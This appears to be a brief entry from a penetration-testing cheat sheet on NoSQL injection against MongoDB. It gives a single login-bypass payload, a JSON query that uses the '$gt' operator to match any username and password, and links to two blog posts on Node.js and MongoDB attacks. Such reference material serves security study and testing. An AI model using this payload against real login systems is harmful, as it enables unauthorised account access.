Nosql-injections#
Nosql-databases like MongoDB is becoming more and more common. So this needs to be expanded.
Login bypass#
Basically change the query to this.
{"user":{"$gt": ""},"pass":{"$gt": ""}}
http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html http://blog.websecurify.com/2014/08/attacks-nodejs-and-mongodb-part-to.html